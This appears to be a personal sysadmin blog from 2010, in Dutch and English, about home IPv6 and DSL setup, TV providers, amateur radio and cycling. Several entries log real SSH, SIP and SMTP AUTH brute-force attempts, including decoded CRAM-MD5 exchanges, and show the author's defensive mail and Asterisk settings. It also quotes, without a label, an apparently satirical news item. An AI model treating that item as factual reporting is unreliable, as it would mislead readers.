May 11 09:17:04 greenblatt sshd[17088]: Invalid user !@#$%^&* from 82.228.181.124
May 11 09:17:05 greenblatt sshd[17090]: Invalid user !@#$% from 82.228.181.124
May 11 09:17:07 greenblatt sshd[17092]: Invalid user @#$%^& from 82.228.181.124

Quit @#$%^& breaking into my system.

Onderweg op de ligfiets geluisterd naar de podcast met de registratie van de nederlandse d-star ronde van de dinsdagavond ervoor. Van die dingen waar je alleen onderweg aan toekomt. Ik was nogal huiverig om op de ligfiets oordopjes in te doen omdat ik het idee heb dat ik meer op gehoor rij dan op een rechtopfiets. Maar op een uiterst bekende route die ik ook bijna slapend kan rijden en waar ik ook weet waar de lastige plekken zitten is het risico minder groot. Ik heb geen gevoel onderweg gehad dat ik ineens in een gevaarlijke situatie zat. Zo naar amateur radio luisteren doet me wel afvragen of er misschien ook amateur radio rondes zijn in de ochtendspits en avondspits. Ik heb gehoord van Mike Andrews W5EGO dat er in Kansas zo een ronde is op werkdagen. Dat is natuurlijk wel de ultieme versie van 'drivetime radio'.

Ok, this one was new to me:

-bash: ./storscript: /bin/bash: bad interpreter: Text file busy

How? the script was copied using scp and there was a hanging sshd (something about a not 100% reliable network).

Nu blijkt Glashart media (die onder andere de TV verzorgt voor XMSnet) officieel ook geen BBC door te mogen geven: Glasvezelabonnees kijken illegaal BBC - Webwereld. Alleen laat Glashart de wensen van hun klanten even voorgaan. Een nieuw concept: een televisie-doorgever die beter naar z'n klanten dan naar z'n contentleveranciers luistert. Ik ben benieuwd wat hier uit komt.
Update: Per 12 juni 2010 is Glashart toch gestopt met BBC 1 en 2. Weinig informatie te vinden over hoe en waarom behalve bij wat providers die het Glashart media pakket doorgeven.

I like htop as a nicer looking replacement for top. And on one machine I recently noticed this little gem: the uptime has an exclamation mark when it runs over 100 days. And a bit of searching confirms: htop has a real easter egg, confirmed by the author.

Ik dacht: ik vraag vandaag eens die 'upgrade' aan bij xs4all, van lite-oud 8 megabit naar lite-nieuw 16 megabit, dan doen ze die maandag of dinsdag en dan weet ik waar ik aan toe ben met de bekabeling omdat ik daar toch al wat meer problemen verwacht.

Binnen 5 minuten na 'bevestigen' deed de telefoonlijn hik en stond er ineens 14583 kilobit downstream. Zo automatisch gaat dat blijkbaar, daar is vast geen monteur aan te pas gekomen. Maar er is dus duidelijk ruimte voor verbetering aan de bekabeling: de verbinding is nu niet heel stabiel, de snelheid is al even omhooggegaan naar 14769 en toen weer gezakt naar 12743 kilobit. Tijd om te kijken hoe een en ander beter kan. Maar aangezien de telefoon ook wat raars doet kijk ik even verder naar mogelijkheden.

De adsl verbinding had weer een slechte dag vandaag, de downstream snelheid was gezakt van 8006 naar 7344 kilobit. Maar eens de telefoonlijn die voor adsl gebruikt wordt nagekeken en het bleek dat deze lijn een rare aftakking had. Dat helpt natuurlijk niet. Die aftakking er af gehaald en toen schoot de noise margin weer omhoog. En na een hint naar het modem om even de snelheid opnieuw te bepalen was het weer 8006 kilobit.
De optie om de hele lange telefoonkabel op te heffen en het adsl modem beneden te zetten blijft natuurlijk. Maar dan moet er weer iets met utp kabel door het huis.

Via de xs4all native IPv6 test komt ook voorbij dat er nu diensten getest worden met IPv6. radio-streams.net geeft voor gebruikers en makers van radio-streams aan wat IPv6 betekent voor ze en heeft een aantal teststreams on-line. Italo en 80s muziek via IPv6!

Wardriving results 1 April - 23 April: 6756 new networks with GPS networks according to WiGLE. My position in the WiGLE stats is bouncing a bit up and down as others are around the same numbers for found networks.

I have been following the developments in amateur radio a bit. A new digital system called d-star is making progress. I found out there is a nearby d-star repeater on the Gerbrandytoren: PI1UTR and noticed they have a radio roundtable every Tuesday evening. I don't have the digital voice equipment to listen to that via the air but these days it is easy: the roundtable uses D-star reflector 017 and there is this 'Listen to REF017A' button which links to a livestream. I copied the livestream URL to the 'Internet radio' setup of the Netgear mediaplayer and listened to the roundtable via the home sound system. Way too easy method to listen to radio amateurs! But it is a nice way to get a feeling for procedures, what is being discussed and such. Even with digital voice and a reasonable quality livestream it still takes experience in radio listening to understand everything.

I found an active nederlandse d-star website but I still can't find a good basic d-star for non-radio-amateurs explained manual. A lot of the information is either really basic or aimed at informing existing users of new developments. The english wikipedia article on D-Star has a lot on the development and technical side of D-Star but not on its use.
Update 2010-04-29: I found a lot more interesting and accessible information at the D-Star UK website.

Toevallig is Henk van de Kamer ook net aan het rekenen aan het televisie aanbod omdat Aalten ook in de planning zit voor glasvezel en een van de aanbieders met een best leuk aanbod komt. Het leuke punt is natuurlijk symmetrisch Internet maar het totale aanbod maakt het ook interresant.

Zeven dagen lang week VVD-Kamerlid Fred Teeven geen moment van haar zijde en keek hij haar aan. Bij het opstaan, bij het naar school gaan, bij het avondeten, overal werd de 15-jarige havo-scholiere Chantal Linsen gevolgd door het politieke zwaargewicht. En ’s nachts sliep hij op een matje naast haar bed. Teeven wilde hiermee bewijzen dat iemand die niets te verbergen heeft, ook niet bang hoeft te zijn voor een gebrek aan privacy.

VVD-er Fred Teeven volgt een week lang 15-jarige scholiere

Grappig is wel dat de website van de Utrechtse programmaraad zichzelf profileert met schotels aan balkons. Als er ergens is waar ze geen invloed hebben omdat mensen zelf wel uitzoeken welke van de duizenden kanalen ze willen kijken is het wel op de schotel.

Volgens een brief van Ziggo gaat CNN uit het analoge pakket in Utrecht omdat ze van de programmaraad TV5 er op moeten zetten en volgens de Utrechtse programmaraad is dat omdat Ziggo het analoge pakket aan het verkleinen is.

En dat nu pas na allerlei juridische procedures het originele advies uit 2008 wordt uitgevoerd. Ziggo wil eigenlijk alles richting digitaal, en zo meer controle over wat de kijkers doen met het tv-signaal en meer verdienste aan extra pakketten. En Ziggo lijkt niet zo blij te zijn met de invloed van de programmaraden.

Aan de andere kant lijkt de programmaraad ook vooral te kiezen voor 'wat mensen zouden moeten willen kijken' (cultuur) en zenders voor vreemde talen gekoppeld aan actieve minderheden (TVE, Spaans) of waar een flinke partij subsidie achter zit (TV5 Monde, Frans). Dat kunnen ze wel willen maar uiteindelijk kijkt 'men' toch naar RTL-4.

We gaan ons zolangzamerhand afvragen waar we heen willen met TV, alles heeft zo z'n nadelen:

• Ziggo analoog krimpt in
• Ziggo digitaal blokkeert actief dat je digitaal opneemt met de PC
• Digitenne heeft geen BBC
• XMSnet komt met dvb-c zonder crypto maar levert nog niet in onze straat (en heeft bij hun Internet-dienst nog nooit gehoord van IPv6)
• Xs4all ging iets met tv doen maar houdt zich ook stil
• Satelliet vraagt een investering in apparatuur, bekabeling en een tocht naar het dak.

En van alles vraagt een investering in apparatuur. Waarbij je dan per apparaat weer moet controleren of het met de dienst samenwerkt en in hoeverre het nog naar de gebruiker wil luisteren. Als een aanbieder besluit dat BBC 2 logisch kanaalnummer 52 heeft wil ik het weer op 14 kunnen zetten, wat ook niet altijd mogelijk is: de Humax iPVR9200C lijkt dit bijvoorbeeld niet te kunnen, de Samsung P850r wel. De voorkeuzenummers zijn er voor mijn gemak, niet voor de marketing-campagnes van aanbieders.

Rustig afwachten is blijkbaar de beste optie. Het kan ook zijn dat dit veranderend medialandschap een teken is dat het hele idee van TV op z'n retour is. Clay Bennett Cartoon: high-definition television
Update 2010-05-04: Officieel blijkt XMSnet ook niet BBC door te mogen geven. Nog een argument om vooral rustig te wachten hoe dat afloopt.

IP version 6 has grown up: I just noticed the first ipv6 firewall log entries which I did not cause with my own testing:

SRC=2002:915e:bf90:000d:f9c9:eab8:7632:0f6d DST=2001:0888:1011:0000:0000:0000:0000:0694 LEN=72 TC=0 HOPLIMIT=120 FLOWLBL=0 PROTO=TCP SPT=49494 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0

A 6to4 IPv6 address trying something stupid with windows filesharing. IPv6 has grown up!

A kernel panic because of some tweaking in the ISDN driver made it time for event-driven maintainance on the home server greenblatt. So I shut down the server, did the last syncs and removed the remaining two parallel ata disks and the promise IDE controller which was no longer needed. I re-enabled the "Cool'n'quiet" bios option so linux power saving works again, which should result in a drop in power use.
Update: As the graph shows removing the disks and re-enabling powersave has helped reducing power use.

Lots of SIP attacks lately (stuff which goes on even when I'm more interested in IPv6). First near-standard SIP registration attacks from Amazon EC2, also seen by one of my asterisk installs:

[Apr 10 16:40:30] NOTICE[6890] chan_sip.c: Registration from '"02"<sip:02@xxx.xxx.xxx.xxx>' failed for '184.73.12.46' - No matching peer found
[Apr 10 16:40:30] NOTICE[6890] chan_sip.c: Registration from '"03"<sip:03@xxx.xxx.xxx.xxx>' failed for '184.73.12.46' - No matching peer found

My system wasn't the only one attacked, I saw reports everywhere, including: Amazon EC2 SIP Brute Force Attacks on Rise - VoIP Tech Chat , Amazon EC2 Flood Attacks from the Cloud - VoIP Users Conference, SIP Attacks From Amazon EC2 Going Unaddressed - SlashDot IT and SIP Brute Force Attack Originating From Amazon EC2 Hosts - Stuart Sheldon.
I changed /etc/asterisk/sip.conf to include alwaysauthreject = yes which makes SIP account enumeration impossible: the attacker can't see the difference between 'account does not exist' or 'password not valid'. This violates the SIP rfc but makes attacks a lot harder.
A lot of the articles above give one answer: Amazon EC2 network abuse does not care. Which immediately degrades the 'standing' of their network. You don't care about attacks originating from your network means lots of people won't care about anything originating from your network.

Het 'Uw adres' kader op de website van de hcc pc!gg netwerkgroep is nu aangepast om bij IPv6 adressen die afgeleid zijn van het netwerkkaart adres (EUI-64 adressen) ook weer te geven van welke leverancier die netwerkkaart is. Dit naar aanleiding van een discussie over IPv6 adressen en privacy extensies.

Ik had nog een raar probleem met IPv6 neighbour discovery op alleen eth0.1. Ook als ik de native ipv6 uitschakelde bleef dit probleem, en alleen op eth0.1. Dat kwam me vaag bekend voor: in 2007 zag ik dit ook al. Ik had even als test een extra adres aan de tunnel toegevoegd en weer weggehaald, maar daardoor stond er weer een dubbele route naar 2001:888:1011::/64. De goeie aanpak is om adressen die ook in andere netwerken voorkomen toe te voegen met een /128 netmask:

    up ip -6 addr add 2001:888:1011::13/128 dev xs4allipv6

Maar niet een IP uit de ene range gebruiken op een andere interface is minder verwarrend. Adressen genoeg ;)

Werkend IPv6 via zowel de tunnel als via de native aansluiting. Ik hou nog even de tunnel aan omdat die een voorspelbare v6 range heeft en ik daarin services heb die extern bereikbaar moeten zijn zoals deze website:

$ dig +short idefix.net aaaa
2001:888:1011::694

En nog veel lastiger om te wijzigen:

   Server Name: NS2.IDEFIX.NET
   IP Address: 2001:888:1011:0:0:0:0:694
   IP Address: 82.95.196.202
   Registrar: EPAG DOMAINSERVICES GMBH

Ik heb er dus voor gekozen wireless clients adressen uit de native range te geven en te routeren via die link, en de server en de wired aansluitingen nog via de v6 tunnel. Daar is rulebased routing voor nodig, en omdat ik verbindingen vanaf de server nog via de tunnel wil is 'native' de uitzondering voor mij. Eerst probeerde ik 'niet tunneladres' als regel:

ip -6 rule add type unicast not from 2001:888:1011::/48 priority 32765 table 17

En dan de routing in /etc/ppp/ipv6-up.d/default :

ip -6 route add default dev ${PPP_IFACE} table 17

Maar dat werkte niet: verkeer vanaf de server naar de wireless clients werd ook de ppp0 link opgestuurd, dat werkte dus niet. Dat was weer te omzeilen door een regel voor het wireless netwerk in table 17 te dupliceren, maar dat is niet handig bij eventuele wijzigingen van de IPv6 range.
Beter: een filter maken wat 'native' verkeer herkent. Een beetje voorkennis helpt: in de xs4all native dsl proef krijgen klanten een /48 uit 2001:980::/32. Dus dan in /etc/ppp/ipv6-up.d/default :

ip -6 rule add type unicast from 2001:980::/32 priority 32765 table 17
ip -6 route add default dev ${PPP_IFACE} table 17 || true

De gewone ipv6 default route komt uit /etc/network/interfaces :

auto xs4allipv6
iface xs4allipv6 inet6 v4tunnel
    endpoint 194.109.5.241
    address 2001:888:10:11::2
    netmask 64
    up ip tunnel change xs4allipv6 ttl 64
    up ip -6 addr add 2001:888:1011::13/128 dev xs4allipv6
    up ip -6 route add unreachable 2001:888:1011::/48
    # rest /48 nullrouten, specifiekere routes hebben voorrang
    up ip -6 route add default via 2001:888:10:11::1 src 2001:888:1011::13
    up ip -6 addr change 2001:888:10:11::2/64 dev xs4allipv6 preferred_lft 0
	# tunneladres nooit als uitgaand adres gebruiken
    #
    down ip -6 route del unreachable 2001:888:1011::/48
    # maar dan moet ik ook die nullroute weer weghalen :)

En nu werkt het voor beide IPv6 ranges. Native:

$ traceroute6 abaris
traceroute to abaris.idefix.net (2001:470:1f15:db:131:211:84:204) from 2001:980:111b:2:21f:e1ff:fe45:2894, port 33434, from port 63747, 30 hops max, 60 byte packets
 1  2001:980:111b:2:21f:c6ff:fe59:76f6 (2001:980:111b:2:21f:c6ff:fe59:76f6)  1.517 ms  1.773 ms  5.713 ms 
 2  lo1.dr4.1d12.xs4all.net (2001:888:0:4401::1)  37.795 ms  39.791 ms  20.754 ms 
 3  2001:888:0:4403::2 (2001:888:0:4403::2)  30.975 ms  17.414 ms  20.025 ms 
 4  0.ge-1-2-0.xr1.sara.xs4all.net (2001:888:2:2::1)  19.104 ms  21.797 ms  26.274 ms 
 5  10gigabitethernet3-3.core1.ams1.he.net (2001:470:0:e8::1)  24.385 ms  17.858 ms  17.255 ms 
 6  gige-gbge0.tserv11.ams1.ipv6.he.net (2001:470:0:7d::2)  24.295 ms  24.621 ms  23.004 ms 
 7  abaris.idefix.net (2001:470:1f15:db:131:211:84:204)  30.448 ms  27.849 ms  21.872 ms 

En tunnel:

$ traceroute6 abaris
traceroute to abaris.idefix.net (2001:470:1f15:db:131:211:84:204) from 2001:888:1011::13, port 33434, from port 53569, 30 hops max, 60 byte packets
 1  xs4all17.ipv6.xs4all.nl (2001:888:10:11::1)  17.177 ms  16.589 ms  17.447 ms 
 2  104.ae0.xr4.1d12.xs4all.net (2001:888:0:3::1)  25.176 ms  22.599 ms  15.982 ms 
 3  0.ge-0-2-0.xr1.sara.xs4all.net (2001:888:2:1::1)  22.124 ms  19.112 ms  19.868 ms 
 4  10gigabitethernet3-3.core1.ams1.he.net (2001:470:0:e8::1)  19.501 ms  16.943 ms  15.742 ms 
 5  gige-gbge0.tserv11.ams1.ipv6.he.net (2001:470:0:7d::2)  24.070 ms  20.348 ms  19.108 ms 
 6  abaris.idefix.net (2001:470:1f15:db:131:211:84:204)  25.500 ms  24.720 ms  21.881 ms 

De juiste data in radvd.conf komt uit een slim scriptje wat net nadat wide-dhcp6c de interfaces geconfigureerd heeft toeslaat. Op het moment dat het script /etc/wide-dhcpv6/dhcp6c-script uitgevoerd wordt is iets te vroeg, dus ik heb daar in staan:

RADVDCONF=/etc/radvd.conf

genradvdconf ()
{
    echo > $RADVDCONF
    for IFACE in "$@"
    do  
        /etc/wide-dhcpv6/iface2radvd.sh $IFACE >> $RADVDCONF
    done
}

( sleep 5 ; genradvdconf eth0.1 eth0.3 ; /etc/init.d/radvd reload ) &

En even doordenkend: als ik ooit iets probeer te benaderen bij een andere xs4all-v6-native klant heb ik inderdaad een probleem (met het ontvangen van de antwoorden). Deze oplossing is dus niet blijvend. Maar als IPv6 over dsl gewoon wordt dan hoef ik niet meer met die tunnel bezig te zijn.

I tried whether the Jabra BT125 bluetooth headset was going to work with both phones. Yes, you can pair this headset with multiple phones. You just need to select 'connect to device' on the phone to convince the headset to switch over.

De speedtouch 510 geeft een duidelijk slechtere lijnkwaliteit:

=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.DMT Annex B  [ISDN Overlay Mode]
Channel Mode          :  interleaved 
Number of resets      :  1 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             ALCB             BDCM 
  VendorSpecific      :             0000             6291 
  StandardRevisionNr  :               01               01 

                                  Downstream        Upstream 
Margin       [dB]     :              8.5              8.0 
Attenuation  [dB]     :             24.0             11.5 
OutputPower  [dBm]    :             18.5             12.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            17962             7616 
  Upstream            :             2113              896 

Eens kijken of daar nog iets aan verandert met multimode:

[adsl]=>config opermode = multimode

Nee, gegevens blijven hetzelfde. Tijd om de speedtouch 546i om te programmeren naar pptp mode zodat die het werk kan doen. Dan heb ik ook weer adsl carrier stats.

With all the IPv6 configuration work something bothers me in ifconfig, it can still decide to stop showing IPv6 (inet6) addresses:

# ifconfig eth0.1
eth0.1    Link encap:Ethernet  HWaddr 00:1f:c6:59:76:f6  
          inet addr:10.42.2.1  Bcast:10.42.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17245335 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17342308 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:10403720060 (9.6 GB)  TX bytes:17783892122 (16.5 GB)

The addresses are there:

# ip -6 addr ls dev eth0.1
3: eth0.1@eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 
    inet6 2001:888:1011::694/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::21f:c6ff:fe59:76f6/64 scope link 
       valid_lft forever preferred_lft forever

Filed as Ubuntu bug 560807: ifconfig does not display inet6 addresses.
Update 2010-04-13: Problem source found, diff added to the bugreport.

Nu komt de stap om machines op het netwerk naar buiten werkend contact te laten maken. De server reageert nog niet op een dhcp6 sollicitation van de client en dat klopt ook wel want ik zie de dhcp group niet geaddresseerd staan in netstat -gn:

eth0.3          2      ff02::1:ff00:0
eth0.3          1      ff02::2
eth0.3          2      ff02::1:ff59:76f6
eth0.3          1      ff02::1

De dhcp6 requests gaan naar ff02::1:2

16:21:39.426238 00:1f:e1:45:28:94 (oui Unknown) > 33:33:00:01:00:02 (oui Unknown), ethertype IPv6 (0x86dd), length 134: fe80::21f:e1ff:fe45:2894.546 > ff02::1:2.547: dhcp6 solicit

Ook zie ik nog geen manier om radvd automatisch de juiste adressen op te laten pakken. Maar een van de mede xs4all IPv6 testers heeft al een scriptje gemaakt wat dat netjes doet.

Ok, een stap verder: Even geen dibbler. Toen het een beetje ging werken deelde dibbler de hele /48 uit aan zowel eth0.1 als eth0.3 via de gegenereerde radvd.conf. Dat was niet de bedoeling. Dus nu eens (na advies via irc) wide-dhcpv6 geprobeerd. Met een simpele config:

interface ppp0
{
        send ia-pd 0;

                script "/etc/wide-dhcpv6/dhcp6c-script";
};
id-assoc pd {
        prefix-interface eth0.1 {
                sla-id 1;
        };
        prefix-interface eth0.3 {
                sla-id 2;
        };
};

Heb ik correcte ip adressen:

eth0.1    Link encap:Ethernet  HWaddr 00:1f:c6:59:76:f6  
          inet addr:10.42.2.1  Bcast:10.42.2.255  Mask:255.255.255.0
          inet6 addr: 2001:980:111b:1:21f:c6ff:fe59:76f6/64 Scope:Global

eth0.3    Link encap:Ethernet  HWaddr 00:1f:c6:59:76:f6  
          inet addr:10.42.20.1  Bcast:10.42.20.255  Mask:255.255.255.0
          inet6 addr: 2001:980:111b:2:21f:c6ff:fe59:76f6/64 Scope:Global

En na het toevoegen van een scriptje /etc/ppp/ipv6-up.d/default met:

#!/bin/sh -e
if [ "${PPP_IPPARAM}" = "xs4all" ]; then
        ip route add 2000::0/3 dev ${PPP_IFACE} || true
fi
exit 0

Heb ik een werkende defaultroute en dus verbinding:

$ ping6 ping6.xs4all.nl
PING ping6.xs4all.nl(xs6.xs4all.nl) 56 data bytes
64 bytes from xs6.xs4all.nl: icmp_seq=1 ttl=62 time=16.8 ms
64 bytes from xs6.xs4all.nl: icmp_seq=2 ttl=62 time=16.7 ms

--- ping6.xs4all.nl ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1005ms
rtt min/avg/max/mdev = 16.787/16.795/16.804/0.129 ms

Het dhcp6c-script had maar gelijk de /etc/resolv.conf aangepast met de xs4all-v6 resolvers. Dus nu heb ik dat script aangepast om daar verder van af te blijven. Maar het is goed dat het werkt, dat maakt standalone autoconfiguratie mogelijk. Dat ik nou zo eigenwijs ben om mijn eigen resolver te draaien is een ander verhaal.

Ok, geleerd: syncppp en IPv6 gaan niet samen. Uit een gewoonte van lang geleden had ik sync aangezet voor pppd en pptp. Dat werkte dus niet. Dus nu ben ik een stap verder:

14:49:57.410595 IP6 (hlim 64, next-header UDP (17) payload length: 52) fe80::5ce9:5839:84c8:9771.546 > ff02::1:2.547: dhcp6 solicit (xid=b2c89c (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])
14:49:57.431702 IP6 (hlim 255, next-header UDP (17) payload length: 148) fe80::90:1a00:142:70eb.547 > fe80::5ce9:5839:84c8:9771.546: dhcp6 advertise (xid=b2c89c (server ID vid 00000a4c45333230)[|dhcp6ext])
14:49:59.430564 IP6 (hlim 64, next-header UDP (17) payload length: 79) fe80::5ce9:5839:84c8:9771.546 > ff02::1:2.547: dhcp6 request (xid=398aab (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])
14:49:59.455518 IP6 (hlim 255, next-header UDP (17) payload length: 148) fe80::90:1a00:142:70eb.547 > fe80::5ce9:5839:84c8:9771.546: dhcp6 reply (xid=398aab (server ID vid 00000a4c45333230)[|dhcp6ext])

De adsl verbinding heb ik nu omgelegd naar een ander adsl modem, een speedtouch 510i. Zo kan ik met een ander modem pptp mode testen en eventueel terug naar een known-good config op de 546i. Dat lukte toen alle kennis over speedtouch configuraties weer boven was. Op de Nederlandse speedtouch configuratie files pagina staat geen pptp setup voor de 510i (wel voor de 546i) maar die was te vinden op Speedtouch 510 v4 PPTP Relay Guide en na wat aanpassingen (xs4all gebruikt vcmux 8*48) prima te gebruiken. Dus ppp0 is nu up met IPv4 en linklocal IPv6:

Apr 11 13:28:59 greenblatt pppd[25425]: pppd 2.4.4 started by root, uid 0
Apr 11 13:28:59 greenblatt pppd[25425]: Using interface ppp0
Apr 11 13:28:59 greenblatt pppd[25425]: Connect: ppp0 <--> /dev/pts/10
Apr 11 13:29:01 greenblatt pppd[25425]: PAP authentication succeeded
Apr 11 13:29:01 greenblatt pppd[25425]: local  IP address 82.95.196.202
Apr 11 13:29:01 greenblatt pppd[25425]: remote IP address 194.109.5.227
Apr 11 13:29:01 greenblatt pppd[25425]: local  LL address fe80::ad68:ab18:01c4:c642
Apr 11 13:29:01 greenblatt pppd[25425]: remote LL address fe80::0090:1a00:0142:70eb

Maar nu IPv6 erbij. Aan de hand van Dibbler config for Xs4all IPv6 pilot /etc/dibbler/client.conf geconfigureerd voor prefix delegation:

# 8 (Debug) is most verbose. 7 (Info) is usually the best option
log-level 8
log-mode syslog

duid-type duid-ll

iface ppp0 {
# ask for address
    pd
}

Maar geen effect tot nog toe, volgens tcpdump krijg ik geen reactie:

14:04:48.620572 IP6 (hlim 64, next-header UDP (17) payload length: 52) fe80::ad68:ab18:1c4:c642.546 > ff02::1:2.547: dhcp6 solicit (xid=115e13 (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])
14:05:24.620567 IP6 (hlim 64, next-header UDP (17) payload length: 52) fe80::ad68:ab18:1c4:c642.546 > ff02::1:2.547: dhcp6 solicit (xid=115e13 (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])

Ik zie wel router advertisments van de andere kant:

14:20:58.998340 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::90:1a00:142:70eb > ff02::1: [icmp6 sum ok] ICMP6, router advertisement, length 24
        hop limit 0, Flags [none], pref medium, router lifetime 1800s, reachable time 0s, retrans time 0s
          mtu option (5), length 8 (1):  1500
            0x0000:  0000 0000 05dc

Maar ook dat heeft geen effect. Rustig verder zoeken.
Update : Speedtouch 510 ini file pptp mode for xs4all-only

Vandaag was een drukke werkdag en daardoor zag ik pas tegen het eind van de middag toen ik even op de Nokia E71 thuismail doorkeek dat ik mee doe aan de xs4all IPv6 pilot. Ik hoor dus niet bij de 'first ping!' mensen, maar gauw maar eens tijd maken om de configuratie rond te krijgen zodat ik native IPv4+IPv6 over DSL werkend krijg. Maar ik zie al een plek om te spieken: xs4all native ipv6 over dsl pptp settings.

Played a bit with QR codes in Google Chart Tools.

But you are already there.

En de goede vulling van het afgelopen weekend was... het jaarlijkse paastreffen van de ligfietsvereniging nvhpv op de camping Harskamperdennen.

• Vrijdag erheen gefietst, bij Vechten afgesproken met wat andere ligfietsers uit Zuid-Holland. Daar moest ik nog even mobiel Internet gebruiken om mezelf op te geven voor de xs4all IPv6 proef. Daarna via een leuke route richting Harskamp, daar de tent opgezet en 's avonds gegeten bij de chinees in Harskamp.
• Zaterdag ben ik er zelf op uitgegaan met de wardriving box achterop de fiets richting Wolfheze, Heelsum, Renkum, Bennekom en terug via Ede. Dat leverde maar liefst 4684 nieuwe netwerken op. Ik ben onderweg wel natgeregend, heb zelfs in Wolfheze een potje staan schuilen. Toen ik terugkwam was het ligfiets-ringsteken al geweest (had ik graag bij gefotografeerd, maargoed). Wel werd er nog een stunt uitgehaald met wat mooi versierde ligfietsen die ik wel op de gevoelige CCD kreeg.
• Zondag zou de georganiseerde toertocht zijn maar het weer was prutje en de toertocht werd afgelast. Toch zijn Mirjam en ik een stukje gaan fietsen door de bossen. Waar alles nat en modderig was, dus ik had een vieze fiets.
• Maandag terug liep eerst mijn ketting er af, toen schoot de kettingbuis weer los en bleef de ketting 'lastig' doen. Later in de rit brak zelfs mijn ketting. Gelukkig was er iemand met een kettingpons in de groep die de ketting gerepareerd heeft (schakels ertussenuit) waardoor de ketting ook minder slecht liep. Bij thuiskomst maar gelijk de fietsen uitgebreid schoongespoten en de kettingen gesmeerd. Toch ben ik denk ik toe aan een nieuwe ketting en tandwielen. En een kettingponsje is denk ik wel een goeie uitbreiding van de onderhoudsspullen bij mijn ligfiets.

De foto's die ik gemaakt heb: Paastreffen 2010 - Foto's Koos van den Hout
Alle hulde voor de organisatoren die er weer een prima evenement van gemaakt hebben!

As part of my work I need to be reachable and at the same time having mobile Internet access would be very handy. The solution was quite simple: a Nokia E71 with a mobile Internet access subscription. Getting it hooked up to the laptop with Ubuntu was dead easy.

Wat andere dingen kwamen ertussen waardoor ik er nog niet over schreef maar vorige week had ook nog belangrijk IPv6 nieuws: mijn provider xs4all zocht xs4all-only gebruikers die mee wilden doen aan een opgeschaalde IPv6 over DSL pilot. Ik was natuurlijk verplicht om een poging te doen om me voor die pilot in te schrijven. Dat kostte wat moeite omdat we toen onderweg waren, maar het is gelukt. Nu is het afwachten of ik mee mag doen met de pilot. Ik heb geen DSL modem wat ipv6 snapt maar ik wil een DSL modem in pptp mode configureren en dan op de server met een v6-aware pppd gaan werken en de zaak verder configureren.

My job has changed, in that I moved within the university to a different place. The department of computer science decided to cut back budget and get rid of their own system administrator group. We got relocated to one level 'up' in the organisational tree at the science-ict group which does ict for all departments (pharmacy, biology, chemistry, math, physics, computer science).

The SMTP auth attack was still going on this morning so I decided to play a bit with the sendmail access config:

SRV_Features:92.241.190.15 A

This disables offering AUTH to the specific attacking IP. The result was interesting in SMTP sessions:

220 kzdoos.xs4all.nl ESMTP Sendmail 8.14.2/8.14.2/Debian-2build1; Tue, 6 Apr 2010 08:25:06 +0200; (No UCE/UBE) logging access from: [92.241.190.15](FAIL)-[92.241.190.15]
9_@@
EHLO hbwgxr.com
250-kzdoos.xs4all.nl Hello [92.241.190.15], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-STARTTLS
250-DELIVERBY
250 HELP
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state

The attacking script leaves out the authentication attempts and just goes on doing nothing. After a short while the attack from 92.241.190.15 stopped.

Interesting (for me) new type of account guessing attack: trying smtp accounts. I saw the following in the maillogs:

Apr  5 22:33:59 greenblatt sm-mta[19364]: o35KXpPO019364: [92.241.190.15]: possible SMTP attack: command=AUTH, count=7
Apr  5 22:34:08 greenblatt sm-mta[19082]: o35KVkYF019082: [92.241.190.15] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-v6

I was wondering what was happening on smtp level and used tcpdump to find out:

220 kzdoos.xs4all.nl ESMTP Sendmail 8.14.2/8.14.2/Debian-2build1; Mon, 5 Apr 2010 20:47:05 +0200; (No UCE/UBE) logging access from: [92.241.190.15](FAIL)-[92.241.190.15]
EHLO jtrmuwev.com
250-kzdoos.xs4all.nl Hello [92.241.190.15], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH DIGEST-MD5 CRAM-MD5
250-STARTTLS
250-DELIVERBY
250 HELP
AUTH CRAM-MD5
334 PDI3MjU0Mjc5OC4xMjIwMjEwMkBremRvb3MueHM0YWxsLm5sPg==
MTExIDk5ODY0YTY5YWI3ODIxMmI3YzgxMjhkOGFmNWM4MjUw
535 5.7.0 authentication failed
535 5.7.0 authentication failed
RSET
250 2.0.0 Reset state
AUTH CRAM-MD5
334 PDEyODQ3MDgxMTYuMTIyMDIxMDNAa3pkb29zLnhzNGFsbC5ubD4=
MTExIDU2YmU3OGYwMGE1MTA5ZmI4OWZmMDFhOGRmMDdjMTBh
535 5.7.0 authentication failed
535 5.7.0 authentication failed
RSET
250 2.0.0 Reset state
AUTH CRAM-MD5
334 PDE4OTQxOTc2MS4xMjIwMjEwNEBremRvb3MueHM0YWxsLm5sPg==
MTExIDE4YmEyYWY2M2MyYjA2Y2Q4OWUxMDE4Y2E2NjY3MmM1
535 5.7.0 authentication failed

The base64 encoded bits decode to:

<272542798.12202102@kzdoos.xs4all.nl>
111 99864a69ab78212b7c8128d8af5c8250

<1284708116.12202103@kzdoos.xs4all.nl>
111 56be78f00a5109fb89ff01a8df07c10a

<189419761.12202104@kzdoos.xs4all.nl>
111 18ba2af63c2b06cd89e1018ca66672c5

